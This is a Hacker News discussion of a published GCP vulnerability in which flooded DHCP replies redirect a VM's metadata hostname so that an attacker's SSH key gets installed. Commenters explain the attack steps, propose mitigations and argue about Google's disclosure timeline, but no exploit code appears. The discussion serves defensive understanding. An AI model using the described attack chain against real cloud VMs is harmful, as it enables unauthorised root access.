[HN Gopher] Google Compute Engine VM takeover via DHCP flood ___________________________________________________________________ Google Compute Engine VM takeover via DHCP flood Author : ithkuil Score : 442 points Date : 2021-06-29 10:16 UTC (12 hours ago) (HTM) web link (github.com) (TXT) w3m dump (github.com) | gerdesj wrote: | This is well worth reading. It describes how, through a series of | well meaning steps, you shoot yourself in the face. | | It all starts with: | | "Note that the last 4 bytes (0a:80:00:02) of the MAC address | (42:01:0a:80:00:02) are actually the same as the internal IP | address of the box (10.128.0.2). This means, 1 of the 3 | components is effectively public." | markus_zhang wrote: | As someone who knows nothing about networking, can you plz | explain why they set up the config as this? Does that mean the | third byte from top must be 0a? | | BTW I just checked my corporate intranet setup and MAC has | nothing to do with the ip address. | champtar wrote: | In most (all?) public cloud you don't have real layer2, | having the MAC computed from the IP allow to make a stateless | ARP responder I guess | markus_zhang wrote: | Thanks! I don't understand the technical details but | (combining multiple responds) I think I understand a bit | now. I also remember that back when I was in the university | we used sort of university intranet (every personal | computer connected has to go through it to the Internet, | but it's free anyway) and there was a lot of ARP attack | then, and I learned to use arp -a and arp -v (maybe wrong). | gerdesj wrote: | Quite. MAC addresses don't need to line up with IP addresses | or vice versa. They are completely different things. However | in IPv6 there is a standard for link local addresses that | does have a correlation between IP and MAC but there you go. | It's designed to avoid clashes and is not the finest design | decision ever made! That last will probably creep into a CVE | one day just like this chain of events. | | The config as designed probably looked like a good idea at | the time. When you are worrying about millions of things in | an address space like IPv4 and MAC, then having them tie up | in some way may be useful for lookups in a very large | database or two. | | However, giving information away about something that was | never designed from the outset to do so is not a good idea. | | If you follow the chain of reasoning in the github post you | can see that you can break the chain at multiple points by | not "being clever". If you start by not making your IP | addresses follow the MAC address you kill this problem off | before it starts. | gerdesj wrote: | At the risk of becoming a real bore, I'll spell out why I | think this is a really, really dumb thing: | | If you have anything to do with fire fighting (and we all | do in a way) you soon learn that there are three things | required for a fire: * Something to burn | * Air (strictly speaking: Oxygen) * Something to | start the fire (source of ignition) | | Fire prevention is based around avoiding having all three | things together at any point in time. So, putting out a | fire often involves removing oxygen or removing the burning | thing. Prevention can be as simple as making a rule at home | that no one puts dish cloths on the hob to dry. That last | phrase may need some translating! | | So, you put your webby app or VM out on the internets for | all to see and play with. Unlike your home front door, | every Tom, Dick and Harry in the world can go and take a | playful kick at it. So you need to take some care with it. | There is no simple set of three factors that you can | protect against as there is for fire prevention. Instead | you need to follow some good practice and hope for the | best. | | One good (not best - there is no such thing) practice is to | avoid giving away information unnecessarily. Linking IP to | MAC is such a thing. Do it at home if you must but don't do | it in public. | tovej wrote: | The automatic host numbering feature in the IPV6 standard | (modified EUI-64,RFC 4291) was a big mistake. But I | thought that worked the other way? that the MAC was part | of the IP, not the IP part of the MAC. | markus_zhang wrote: | Thanks! This is good point. Yeah I kind of understand why | they make the initial desicision back then -- much easier | to implement. | Sebb767 wrote: | It's so strange to me that they have a process for adding a root | key that involves no authentication at all. These are VMs with | their images running their pre-installed software, it's not like | this would have been a hard problem. | champtar wrote: | In GKE it allowed to go from a hostNetwork pod to root on the | node: http://blog.champtar.fr/Metadata_MITM_root_EKS_GKE/ | joelbondurant wrote: | Communist data is public property. | zomgwat wrote: | If I understand correctly, the attack can be mitigated with the | appropriate level of firewall rules. Both ingress and egress | traffic should be blocked by default and selectively allowed | based on need. In this case, DHCP traffic would only be allowed | to 169.254.169.254. | | You still have somebody in your network though, so there's that. | rantwasp wrote: | that's not how DHCP works. in the context of a machine coming | up/renewing a lease it's basically a broadcast and anyone on | the network can reply. the traffic needs to happen on the | interface where you get the ip (guessing the main interface is | also using dhcp) | zomgwat wrote: | How does traffic reach or leave the machine if a network | level firewall is restricting access? It seems I have a | fundamental misunderstanding of something. | rantwasp wrote: | if you have a network level firewall blocking DHCP traffic, | you will not be able to do DHCP. | | The way it works for physical hosts is that all machines in | the same rack see the dhcp traffic and the TOR has a | special ip helper configured where it's sending the DHCP | traffic. So it's broadcast in the rack and after that point | to point, but still there is zero to no security when it | comes to DHCP traffic. | | For VMs, I guess the hypervisor acts as the TOR with the | same limitations. | res0nat0r wrote: | Essentially this: | | > The firewall/router of GCP blocks broadcast packets sent | by VMs, so only the metadata server (169.254.169.254) | receives them. However, some phases of the DHCP protocol | don't rely on broadcasts, and the packets to be sent can be | easily calculated and sent in advance. | | > To mount this attack, the attacker needs to craft | multiple DHCP packets using a set of | precalculated/suspected XIDs and flood the victim's | dhclient directly (no broadcasts here). If the XID is | correct, the victim machine applies the network | configuration. This is a race condition, but since the | flood is fast and exhaustive, the metadata server has no | real chance to win. | | > Google heavily relies on the Metadata server, including | the distribution of ssh public keys. The connection is | secured at the network/routing layer and the server is not | authenticated (no TLS, clear http only). The | google_guest_agent process, that is responsible for | processing the responses of the Metadata server, | establishes the connection via the virtual hostname | metadata.google.internal which is an alias in the | /etc/hosts file. | | He appears to spoof the DHCP packets to get the victim to | respond to his rogue metadata server, insert the IP address | of his metadata server into the /etc/hosts entry for | metadata.google.internal, then is able to have his ssh | pubkey installed on the victim so he can ssh to the host. | willvarfar wrote: | Has it been verified that GCE is still vulnerable? | | There's clearly a communication gap between the researcher and | Google. But perhaps the techies at Google saw it and fixed it and | it just hasn't been communicated, or some other change in GCE has | closed it or mitigated it? | SahAssar wrote: | The author asked for an update 2021-06-08, 8 months after | reporting it. If they fixed it why wouldn't they say so? | remus wrote: | While it certainly seems like a fairly serious vulnerability I | think it's worth highlighting that this attack requires that | either you already have access to a machine on the same subnet as | the target machine or that the firewall in front of the target | machine is very lax. That's a pretty high bar for getting the | attack to work in the wild. | cmeacham98 wrote: | Note that "have access to a machine on the same subnet" really | just means "can send traffic to the VM local network". In other | words, partial compromises (ex: docker container, VM, chroot) | that have access to this network are enough, as well as attacks | that let you send traffic (ex: TURN server abuse) | asah wrote: | -1: consider if you have complex vendor software on a GCE VM | inside a larger GCP project... now a vulnerability in that | vendor software means the whole GCP project is exposed. Vendor | fixes are notoriously slow, so in practice you have to isolate | vendor software to separate GCP projects. | | Real example: I have a client with precisely this situation, | and elsewhere in the GCP project is PII consumer data requiring | public disclosure if exposed. | mywittyname wrote: | Luckily, GCE limits Cloud API access available to an instance | to nothing by default. Meaning that access to BigQuery, | Storage, SQL, User manage, etc is not allowed on that VM, | even with root access to the VM, unless configured by the | administrator. | | This at least mitigates the the impact of this exploit to a | degree. If a web server has access only to Cloud SQL, an | attacker cannot use access to that VM to go digging around in | Cloud Storage buckets unless GCS access is granted explicitly | to the VM. | | From there, IAM security applies. So even if the VM has Cloud | API access to, say Big Query, the limitations of that Service | Account then applies to any data that is accessed. | asah wrote: | I thought this attack allows one VM to takeover another VM, | and the victim VM (the software on that VM...) talks with | those services? | mukesh610 wrote: | > elsewhere in the project is PII | | Servers holding PII should be firewalled off. Necessary | traffic should be explicitly granted. That would remedy the | issue a bit. | asah wrote: | IIUC this is insufficient (!) - even with a firewall | between them, a VM now vulnerable to attack from another VM | on the subnet (in the same GCP project). | mywittyname wrote: | Most of my GCP clients shove PII into a GCP Service, like | BQ. It's not put on a "server" per se, so firewall rules | don't really apply here. The appropriate thing to assert is | that necessary IAM permissions should be granted | explicitly. | | This is usually the case. As most of my clients use | isolated GCP projects for housing PII data. This forces IAM | permissions to be granted service accounts, which, | _hopefully_ , means that administrators are cognizant of | the levels of access that they are granting to service | accounts. | | Not a guarantee, mind you, but hopefully some redflags | would be raised if a someone requested PII-level access for | a Service Account associated with a public facing web | server. | remus wrote: | I completely agree and didn't mean to suggest it wasn't a | serious vulnerability: as I understand it this attack means | that if any VM in the subnet is compromised that can be | leveraged in to an attack on any VM in the subnet so your | attack surface has suddenly gotten a lot bigger and your | isolation between VMs substantially poorer. | exitheone wrote: | I think the real learning here is not to colocate different | things in a single GCP project. AFAIK projects don't cost | anything so why not create one per service? | asah wrote: | The way you're wording this suggests that this was a | sensible design prior to this vulnerability, but in fact | all sorts of tools, config, etc work within a project but | not across projects, including IAM. Yes obviously anything | can be duplicated but it's a big pain. | | Probably easier to create separate subnets for VMs that | don't trust each other ? | briffle wrote: | IAM works across projects easily. The "Organization" | concept it Google Cloud is used to collect projects, and | manage permissions of groups (or subfolders) of projects | very easily. | rantwasp wrote: | the real learning for me is to not use gcp. sounds harsh, | but you don't get second chances when it comes to trust in | this context. | tryauuum wrote: | I wonder if they have actually tested the last scenario: | | > Targeting a VM over the internet. This requires the firewall | in front of the victim VM to be fully open. | | I mean, even if the firewall is non-existing, can you really | carry a dhcp payload over the public internet? | | EDIT: still haven't read the whole thing, but looks like they | did test it | pmontra wrote: | They did test that scenario | | https://github.com/irsl/gcp-dhcp-takeover-code-exec#attack-3 | tryauuum wrote: | Google should probably block these kind of packets, | anything from/to udp ports 67/68. Might be a little harsh, | but secure | asah wrote: | Same subnet = as another VM in your project? or random GCP VM | that happens to share your subnet? Seems like pretty different | risk levels... | | https://github.com/irsl/gcp-dhcp-takeover-code-exec#attack-s... | Rockslide wrote: | it literally says "same project" right there | asah wrote: | Thanks. Sorry, just wanted to be completely sure. | kl4m wrote: | The usual configuration is 1 or many subnets per VPC, and one | or many VPC per project. a Shared VPC setup between projects is | also possible but requires prior agreement from both projects. | sparkling wrote: | Very creative approach, never thought of such an attack vector. | tryauuum wrote: | Yeah. I knew that some parts of DHCP are ipv4 and unicast... | but to carry such a packet over the internet, what a bold move | londons_explore wrote: | This attack allows an adversary to move from root permissions on | one VM in a GCP project to gaining root permissions on another VM | in the same project. | | The attack is unlikely to succeed unless the attacker knows the | exact time a particular VM was last rebooted, or can cause a | reboot. | | Overall, this attack alone probably won't be the reason you will | have to start filling in a GDPR notification to your users... | addingnumbers wrote: | I'm super confused by the statement "The unix time component | has a more broad domain, but this turns out to be not a | practical problem (see later)." | | I don't know what exactly he expected us to "see later," except | that he knows exactly when the target machine rebooted down to | a 15 second window because he already had full control over it | before starting the attack... | londons_explore wrote: | I can imagine cases where an attacker could have good | knowledge of the reboot time of a system. For example, they | could ping it for months waiting for a maintenance reboot. | | Or they could flood the machine with requests, hoping to | cause some monitoring system or human to reboot it. | | But overall, it seems unlikely... | Arnavion wrote: | >I don't know what exactly he expected us to "see later," | | See all mentions of "Attack #2" | darkwater wrote: | Well, it can be used in a chain of attack to jump from one | compromised, external-facing machine to another only internal | one that might hold more sensitive data. Or to run some inside- | job (although in that case developers should not be able to | spawn up a VM in production) | rafaelturk wrote: | Apparently Google Project Zero timeline only applies to others... | viraptor wrote: | I think you're mixing up the projects a bit. This vulnerability | doesn't seem to be going via Project Zero. Other google teams | are known to sometimes not react in time and when the reports | are going through Project Zero, they are disclosed at 90 days, | regardless if the project is internal or not. (I remember an | unpatched Chrome vulnerability was published by Project Zero at | the end of deadline) | | So the Zero timeline applies to everyone the same. It doesn't | mean fixes actually happen on the same timeline. | emayljames wrote: | parent comment is reffering to the double standards. One rule | for google disclosing others vulns, another for their own | vulns. | atatatat wrote: | was this found by, or originally reported to, Project Zero? | manquer wrote: | Precisely the point OP is saying. The rules for project | zero are different not that project zero is applying it | differently. | UncleMeat wrote: | 90 days is fairly common in the industry, but not | universal. GPZ is definitely not uniquely strict on | disclosures. | manquer wrote: | Thsts not problem It is not that project zero is strict, | | The researcher here allowed 9 months for them to fix. | Should he have disclosed after 90 days ? Clearly google | didn't use the time to fix. | | It looks bad when you have a hard policy to disclose but | not to fix | UncleMeat wrote: | He could have if he wanted to. He could have disclosed | immediately if he wanted to. | | _Google_ does not have a hard policy to disclose. GPZ | does. Vulns in external products found through other | groups within Google do not share all the same processes | as GPZ. | manquer wrote: | GPZ is not some independent entity google just funds, | they are as much part of Google as any other team. | | If you want to be that precise, it is bad look for part | of your organization to have hard policy that you expect | external companies to follow, while parts of your | organization itself cannot do the same. | | I am not saying Project Zero is wrong, clearly giving | more time did not prod Google to actually fix timely, he | certainly was being too polite and gave too much time, I | don't know why, perhaps companies don't pay bounties if | you disclose without their consent [2] ? | | All I am just saying Google as a company should hold | itself to the same hard standard and fix issues in 90 | days this is what Google Project Zero as a team expects | other companies[1] to do so, they will even reject | requests for extensions. | | As a company if they can't do it, they shouldn't expect | others to do it either right? Or they should disclose | reported vulnerabilities even if not fixed in 90 days. | | [1] Maybe they do it for internal teams as well, but that | not relevant to us, all we should be concerned is how | they behave externally with disclosing and solving | issues. | | [2] Perhaps part of the reason GPZ is able to do this | hard policy is because they don't depend on bug bounties | as source of income as independent researchers do. | jrockway wrote: | > The researcher here allowed 9 months for them to fix. | | The researcher is basically allowed to do whatever they | want here. They can wait 0 days and just post to the | full-disclosure mailing list. Or they could never | disclose it. | | Personally, I've done both. I took DJB's "Unix Security | Holes" class, where we had to find 10 vulnerabilities in | OSS as the class's final project. All of those got 0-day | disclosed because that is how DJB rolls. I've also | independently found bugs, and I was satisfied by the | resolution from emailing security@ that company. | breakingcups wrote: | Their point is, Project Zero is a very public Google project | to hold other companies (and yes, themselves too) accountable | with disclosure policies Google (as a company) presumably | stands behind. Thus it is quite ironic for an issue to not be | fixed _in a year_. | | Yes, sometimes other Google teams miss the deadline set by | Project Zero too. That's not the point. | [deleted] | jsnell wrote: | The timeline for disclosure is set by the reporter, no? "We | will disclose this bug on YYYY-MM-DD". The other side can ask | for an extension, but has no intrinsic right to one. Unless I | am missing something, this has nothing to do with PZ, so their | default timeline is totally irrelevant. | Cthulhu_ wrote: | I believe PZ can set the terms of reasonable disclosure (and | the like) as a condition for paying out. | manquer wrote: | Depends on if you want to get paid. Many organizations will | not pay bug bounties if you disclose before they fix or | without their consent. | | Project Zero probably doesn't care or doesn't even accept the | bounties | jsnell wrote: | The post had no indication of a bounty being held hostage. | From https://www.google.com/about/appsecurity/reward- | program/ it seems like the requirement for a bounty is not | for "don't disclose before fix is released", but "don't | disclose without reasonable advance notice". | | So I just don't see the inconsistency here. Project Zero | gives a disclosure deadline. The reporter here chose not to | give one. When they said they wanted to disclose, there was | no stalling for extra time. Just what is the expectation | here? | tptacek wrote: | This superficial dismissal doesn't even make sense. Google | didn't control the disclosure timeline here. The people who | found these vulnerabilities could have published on T+90, or, | for that matter, T+1. Meanwhile, the norm that does exist (it's | a soft norm) is that you respect the disclosure preferences of | the person who reports the vulnerability to the extent you | reasonably can. | | I'm not sure I even understand the impulse behind writing a | comment like this. Assume Google simply refuses to apply the P0 | disclosure rule to themselves (this isn't the case, but just | stipulate). Do you want them to _stop_ funding Project Zero? Do | you wish you knew less about high profile vulnerabilities? | Sebb767 wrote: | He reported the issue first on 2020-09-26 [0], nearly a year | ago. | | [0] https://github.com/irsl/gcp-dhcp-takeover-code- | exec#timeline | _trampeltier wrote: | Love the 2020-12-03: ... "holiday season coming up" | [deleted] | [deleted] | southerntofu wrote: | > any security-conscious GCP customers | | Does that exist? In my book, if you're security conscious, you | can only do self-hosting whether on premises or in your own bay | in a datacenter. | | Giving away your entire computing and networking to a third party | such as Google is orthogonal to security. | AnIdiotOnTheNet wrote: | I agree, but given your how grey your text currently is I think | too many HNers' careers depend on the cloud for them to ever | agree with us. | throwaway3699 wrote: | Most people's threat models do not assume Amazon or Google are | threats. Especially when you sign very large contracts with | them, the law is enough to keep them in check. | dangerface wrote: | Thats the issue, Amazon and Google are dependencies that are | overlooked as too big to fail. Anything overlooked because it | "can't fail" is the perfect place to attack. | _jal wrote: | But if you don't, your threat model is a work of fiction and | you're wasting your time play-acting. | | A threat model has no basis in reality if you do not | accurately model threats, and your infra vendor is a | glaringly obvious threat. Now, maybe that's a risk worth the | tradeoffs, but how do you know that? | shiftpgdn wrote: | You should absolutely consider your cloud provider a threat. | What happens in a black swan even where a provider is | completely compromised? Design around zero trust networks. | dmos62 wrote: | It's unreasonable to always design around not trusting any | third party. | southerntofu wrote: | Sure you must always put some levels of trust in 3rd | parties. What level of trust is the important question. | Ideally, you distribute that trust among several actors | so a single compromise is not too much of a deal. | | That's why you use different hardware vendors for your | routers and servers, another vendor for your network | connectivity, and yet other vendors for your software. | This way, MiTM is mitigated by TLS (or equivalent) and | server compromise is mitigated by a good firewall and | network inspection stack. Placing all your eggs in a | single Google basket is giving a lot of power to a single | "don't be evil" corporation, who may get hacked or | compelled by law enforcement to spy on you and your | clients. | ClumsyPilot wrote: | Do it right, and you might mitigate threats, but do it | wrong, and you are introducing more points where you | could be compromised - a single supplier can be audited, | a 100 cannot | SEJeff wrote: | It really depends on your threat model. It is not always | unreasonable. | | Target trusted their HVAC management firm so much that | they had full unsegmented access to the LAN in each | store. The credit card swipe terminals in the same LAN | were totally compromised and millions of users had their | credit card credentials stolen. | | Defense contractors and places that store / manage large | amounts of money are totally within their mandates to | trust no one, not even many of their own employees. | alksjdalkj wrote: | Did Target really trust their HVAC firm or was their | network just poorly segmented? | SEJeff wrote: | Both. | | Someone hacked their HVAC firm to hack target credit | swipe terminals. | | At the time it was the biggest hack in US history. | alksjdalkj wrote: | Right, I'm familiar with the hack. My point is Target | almost certainly didn't decide that the HVAC firm could | be trusted to have access to the credit terminals - the | fact that they had access was the result of poor security | design, not Target's threat model. | EricE wrote: | I've often found poor security designs justified by many | of the arguments in this thread that it's unreasonable to | treat everything as a threat. | | They know it's a bad design but doesn't matter because | the threat is too improbable. Until it isn't :p | SEJeff wrote: | I've been in meetings where executives have said | _precisely_ this and I have tried to gently nudge them | towards defense in depth. | SEJeff wrote: | Ok fair. I see the lack of simple things like segmented | vlans as a lack of a threat model entirely. They trusted | them implicitly, not explicitly, through their clear | incompetence. Perhaps that's better? | | I think we are mostly in agreement. | ClumsyPilot wrote: | By all means, but then are assuming that your suppliers are | a threat? Did you check every chip on the motherboard that | comes im, verify the firmware and bios on all components, | including firmware of webcams and SSD's? Who inspected | source code of evrry driver? Did you vet every employee and | what did you do about Intel Management engine? | | All these measures are not feasible unless you are working | in national security or a Megacorp, and insisting on one of | them, while ignoring others, is daft | __s wrote: | > working in national security | | & for national security cases they're provided sovereign | clouds | alksjdalkj wrote: | Supply chain is still an issue in sovereign clouds. At | some point there's still a trust decision, whether that's | to trust the cloud provider, the hardware manufacturer, | the chip manufacturer, etc. | fragmede wrote: | For organisations with the resources to deal with an APT, | great lengths are gone to in order to verify that the | supply chain is trusted all the way down to the chip | manufacturer. The hardware used isn't just bought from | Best Buy and given a huge dose of trust, but instead | there are with many _many_ steps to verify that the eg | the hard drives are using the expected firmware version. | You spend as much as you can on the whole process, but if | your threat model includes the CIA, China, and the FSB, | it 's exceeding expensive. | alksjdalkj wrote: | I wish that were true but it's really not. At least not | within the public sector, maybe wealthier private firms | can afford to do that level of verification. | | Anyway, even then you still need to make trust decisions. | How do you verify the ICs in your HDD haven't been | tampered with? How do you know the firmware wasn't built | with a malicious compiler? Or that a bad actor didn't add | a backdoor to the firmware? Realistically there's a lot | of components in modern computers that we have no choice | but to trust. | SEJeff wrote: | Confidential computing (Intel SGX, ARM TrustZone, AMD SEV-SNP) | handle this by encrypting the virtual machine memory so that | even having full root on the host does not expose vm compute or | memory. | | There are plenty of ways to do zero trust networking, a slick | commercial implementation is https://tailscale.com/, which you | can totally use in the cloud for secure node to node comms if | you're worried about those things. | q3k wrote: | > Confidential computing (Intel SGX, ARM TrustZone, AMD SEV- | SNP) handle this by encrypting the virtual machine memory so | that even having full root on the host does not expose vm | compute or memory. | | Google's current confidential compute offering does not prove | at runtime that it's actually confidential. You just get a | bit in your cloud console saying 'yep it's confidential' (and | some runtime CPU bit too, but that's easily spoofable by a | compromised hypervisor), but no cryptographically verifiable | proof from AMD that things actually are confidential. | SEJeff wrote: | Yes, Google tries to abstract SEV from you, but it is SEV- | SNP that we really need for this. Our account manager | confirmed they're not offering SEV-SNP yet. | | But you know this for metropolis, right? :) | antoncohen wrote: | While there are a series of vulnerabilities here, none of them | would be exploitable in this way if the metadata server was | accessed via an IP instead of the hostname | metadata.google.internal. | | The metadata server is documented to be at 169.254.169.25, | always[1]. But Google software (agents and libraries on VMs) | resolves it by looking up metadata.google.internal. If | metadata.google.internal isn't in /etc/hosts, as can be the case | in containers, this can result in actual DNS lookups over the | network to get an address that should be known. | | AWS uses the same address for their metadata server, but accesses | via the IP address and not some hostname[2]. | | I've seen Google managed DNS servers (in GKE clusters) fall over | under the load of Google libraries querying for the metadata | address[3]. I'm guessing Google wants to maintain some | flexibility, which is why they are using a hostname, but there | are tradeoffs. | | [1] https://cloud.google.com/compute/docs/internal-dns | | [2] | https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance... | | [3] This is easily solvable with Kubernetes HostAliases that | write /etc/hosts in the containers. | tryauuum wrote: | I think even without metadata server replacement this attack | would still be painful. The ability to reconfigure network on a | victim sounds painful | antoncohen wrote: | That is true, I was thinking specifically about the metadata | and SSH keys. But DHCP can also set DNS servers, NTP servers, | and other things that can either cause disruptions or be used | to facilitate a different attack. | | There might be a persistence issue, it seems like part of | this attack was that the IP was persisted to /etc/hosts even | after the real DHCP server took over again. But even just | writing to /etc/hosts could open the door redirecting traffic | to an attacker controlled server. | aenis wrote: | It does not even take a lot. I run a production service on | cloud run, the typical load is around 500qps, and the dns | queries to resolve metadata server do fail frequently enough | for this to be noticeable. | bradfitz wrote: | Even Google's Go client for the GCE metadata uses an IP | address: | | > Using a fixed IP makes it very difficult to spoof the | metadata | | https://github.com/googleapis/google-cloud-go/commit/ae56891... | skj wrote: | Hmm cloud build spoofs it :) if the customer build accessed | the underlying VM's metadata it would be very confusing | (though not a security issue). | | It was not straightforward. I learned a lot about iptables | and docker networking. | corty wrote: | Why the hell isn't the metadata server authenticated, e.g. via | TLS certificates? | londons_explore wrote: | So why isn't the metadata server authenticated? | | It would seem simple enough for googles metadata server to have a | valid HTTPS certificate and be hosted on a non-internal domain. | Or use an internal domain, but make pre-built images use a custom | CA. | | Or Google could make a 'trusted network device', rather like a | VPN, which routes traffic for 169.254.169.254 (the metadata | server IP address) and add metadata.google.internal to the hosts | file as 169.254.169.254. | rantwasp wrote: | how do you get the certs to the machines? ever had to rotate | certs for all the machine in a datacenter? | londons_explore wrote: | To the metadata servers? They presumably hold keys to access | all kinds of backend systems anyway. The certs don't require | any additional trust. There must already be infrastructure in | place for deploying said keys. | rantwasp wrote: | yes and no. when doing stuff like this you will always have | a chicken and egg problem. | nijave wrote: | You could also do a hybrid where each machine gets a | volume with an x509 cert and key only root has access to | which can then be used to mTLS to a network service | (which can then manage the certs) | | That'd be a hybrid of cloud init data volume and network | service | rantwasp wrote: | you could, the problem with this approach is how do you | manage these volumes and the infrastructure around it. | How do you get the keys on that volume? | | Usually, this trust is established when the machine is | built the first time and it gets an identity and a cert | assigned to it. You have the same problems (of how you | control the infra and ensure that you and only you can do | this on the network). | staticassertion wrote: | https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/configur. | .. | | Not mTLS, but AWS metadata v2 has moved to an authenticated | session-based system. Of course, an attacker who can make | arbitrary requests can create tokens for limited sessions, | but it's certainly an improvement. | nijave wrote: | Google happens to have a widely trusted CA they could sign | the metadata server cert with | rantwasp wrote: | my question is, if the CA cert needs to be rotated, how do | you do this for all machines? it can be done, but it's not | trivial | zokier wrote: | The combination of dhcp, magic metadata servers, and cloud-init | feels so awkward way of managing VM provisioning. I'm thinking | would having a proper virtual device or maybe something on uefi | layer clean up things? | CodesInChaos wrote: | Metadata servers should not exist. An application having | network access should not grant it any sensitive privileges. | formerly_proven wrote: | So I just read up on what this is and what they're for and | can't help the feeling this is an "everything is a nail" | design. | CodesInChaos wrote: | The traditional unix "everything is a file" approach would | be much better than those metadata services. | jcims wrote: | Totally agree. A block device with the contents of the | metadata service in it would be nice! It becomes trivial | to provide at least basic access control to the service. | rkeene2 wrote: | This is done by some cloud software (e.g., OpenNebula). | The downside is that modifying the metadata is now | difficult since block devices being hot-plugged can cause | issues if in use. | cesarb wrote: | Last time I helped administer a deployment on one of these | clouds, one of the first things we did on the startup script | for the instances was to install an iptables rule so that | only uid 0 (root) could talk to the metadata servers. The | need for that kind of firewall rule on every instance shows | that these metadata servers are a bad design. | | It would be much better if, instead of the network, these | metadata servers were only visible as a PCIe or MMIO device. | Of course, that would require a driver to be written, so at | least initially, unmodified distributions would not be able | to be used (but after a few years, every Linux and BSD | distribution, and perhaps even Windows, would have that | driver by default). That way, it would (on Linux) appear as | files on /sys, readable only by root, without requiring any | local firewall. | rjzzleep wrote: | Is there a list of these mitigations somewhere? | amluto wrote: | There are ways for (virtual) firmware to expose data | directly into sysfs, e.g. DMI and WMI. There are probably | nicer ones, too. A virtio-9p instance exposing metadata | would do the trick, too. Or trusted emulated network | interface. | nijave wrote: | vsock might be a good solution | rkeene2 wrote: | OpenNebula solves this by attaching an ISO image with | credentials and metadata to the CD-ROM virtual device, so | only root can get the credentials to make calls and also the | metadata is there. | edf13 wrote: | It's far worse... the Metadata can provision a new public ssh | key to the VM (at will!). | | I wasn't aware of this single point of failure | tytso wrote: | There's a really simple (albeit hacky) workaround which can be | deployed fairly quickly. In /etc/dhcp/dhclient-exit- | hooks.d/google_set_hostname replace this line: | | if [ -n "$new_host_name" ] && [ -n "$new_ip_address" ]; then | | with this: | | if [ -n "$new_host_name" -a ! "$new_host_name" =~ | metadata.google.internal ] && [ -n "$new_ip_address" ]; then | | (Yes, =~ is a bashism, but google_set_hostname is a bash script.) | | This prevents /etc/hosts from getting poisoned with a bogus entry | for the metadata server. Of course, dhcpd should also be fixed to | use a better random number generator, and the firewall should be | default stop dhcp packets from any IP address other than Google's | DHCP server. Belt and suspenders, after all. But fixing the | dhclient exit hooks is a simple text edit. | floatingatoll wrote: | != would be a simple non-regex replacement, right? Or are there | parts to the exploit hostname that aren't a literal match? | tytso wrote: | The reason why I used the regex match is because the attacker | might try to add one or spaces as a prefix and/or suffix, e.g | " metadata.google.internal " which wouldn't match | "metadata.google.internal" but the spaces in /etc/hosts name | would be ignored and still be effective in poisoning the | /etc/hosts lookup for metadata.google.internal. | cle wrote: | The more concerning security finding here is that Google sat on | this for 9 months. Assuming the claims hold, this is a serious | problem for any security-conscious GCP customers. What other | vulnerabilities are they sitting on? Do they have processes in | place to promptly handle new ones? Doesn't look like it... | kerng wrote: | Agreed, especially Google's comment early December about | "holiday seasons" seems strange after not having done anything | for 2 months already... | | When it comes to others (like Microsoft) Google is always quick | to publish their findings, regardless of other circumstances. | saghm wrote: | This is especially questionable given the much shorter deadline | that Project Zero gives other companies to fix bugs before | publishing their vulnerabilities (regardless of whether there's | been a fix). It only seems fair that Google should hold itself | to the same standard. | dataflow wrote: | Project Zero gives Google the same timeline. This had nothing | to do with Project Zero from what I understand. | breakingcups wrote: | Project Zero is a (very public) Google project though. If | they stand behind their choices and policies, they should | live by them. | joshuamorton wrote: | In what way is Google not standing by their policies (for | example, have they criticized or tried to prevent this | person from disclosing publicly)? | e40 wrote: | The clear implication is by not fixing the bug in the | same time frame. | joshuamorton wrote: | What is the thing being implied? Like as far as I can | tell, Google's position seems to be that "it is best if | vuln researchers have the freedom to disclose unfixed | issues, especially after reporting them". | | People criticize P0 for publishing issues despite | companies asking for extensions. But we're criticizing | Google here for...what? They didn't ask for an extension, | they didn't try to prevent this person from disclosing. | Where is the hypocritical thing? | staticassertion wrote: | They didn't _fix it_ within that timeline. I don 't know | why everyone is saying "well they didn't stop disclosure | in 90 days", but they didn't _fix it_ in the timeline | that they have allocated as being reasonable for all | vulns they report. | jsnell wrote: | At the limit, what you're saying would mean that vendors | should feel obligated to fix issues they don't consider | to be vulnerabilities, as long as they're reported as | such. That'd clearly be absurd. Is there maybe some | additional qualifying factor that's required to trigger | this obligation that you've left implicit? | staticassertion wrote: | > what you're saying would mean that vendors should feel | obligated to fix issues they don't consider to be | vulnerabilities | | Why would it? | | > Is there maybe some additional qualifying factor that's | required to trigger this obligation that you've left | implicit? | | That they consider it a vulnerability seems fine. | jsnell wrote: | If you're leaving the determination to the vendor, they | could just avoid the deadline by claiming it is not a | vulnerability. That seems like a bad incentive. | | There are things that literally cannot be fixed, or where | the risk of the fix is higher than the risk of leaving | the vulnerability open. (Even if it is publicly | disclosed!) | | It seems that we're all better off when these two | concerns are not artificially coupled. A company can both | admit that something is a vulnerability, and not fix it, | if that's the right tradeoff. They're of course paying | the PR cost of being seen as having unfixed security | bugs, and an even bigger PR cost if the issue ends up | being exploited and causes damage. But that's just part | of the tradeoff computation. | staticassertion wrote: | I don't know what point you're trying to make here. | Google acknowledges that this is a vulnerability ("nice | catch"), Google pushes every other company to fix vulns | in 90 days (or have it publicly disclosed, which is based | on the assumption that vulns can be fixed in that time), | and Google did not fix it in 90 days. | | If you're asking me to create a perfect framework for | disclosure, I'm not interested in doing that, and it's | completely unnecessary to make a judgment of this single | scenario. | | > A company can both admit that something is a | vulnerability, and not fix it, if that's the right | tradeoff. | | Google's 90 days policy is designed explicitly to give | companies ample time to patch. And yes, this is them | paying the PR cost - I am judging them negatively in this | discussion because I agree with their 90 day policy. | jsnell wrote: | I am saying that there are things that are technically | vulnerabilities that are not worth fixing. Either they | are too risky or expensive to fix, or too impractical to | exploit, or too limited in damage to actually worry | about. Given the line you drew was that there must be a | fix in 90 days, if the company agrees it is a | vulnerability, the logical conclusion is that the | companies would end up claiming "not a vulnerability" | when they mean WONTFIX. | | If you think this particular issue should have been fixed | within a given timeline, it should be on the merits of | the issue itself. Not just by following a "everything | must be fixed in 90 days" dogma. All that the repeated | invocations of PZ have achieved is drown out any | discussion on the report itself. How serious/exploitable | is it actually, how would it be mitigated/fixed, what | might have blocked that being done, etc. Seems like those | would have been far more interesting discussions than a | silly game of gotcha. | | (If you believe there is no such thing as a vulnerability | that cannot be fixed, or that's not worth fixing, then I | don't know that we'll find common ground.) | staticassertion wrote: | > Given the line you drew was that there must be a fix in | 90 days, if the company agrees it is a vulnerability, the | logical conclusion is that the companies would end up | claiming "not a vulnerability" when they mean WONTFIX. | | OK, but that doesn't apply here, which is why I don't get | why you're bringing up _general_ policy issues in this | _specific_ 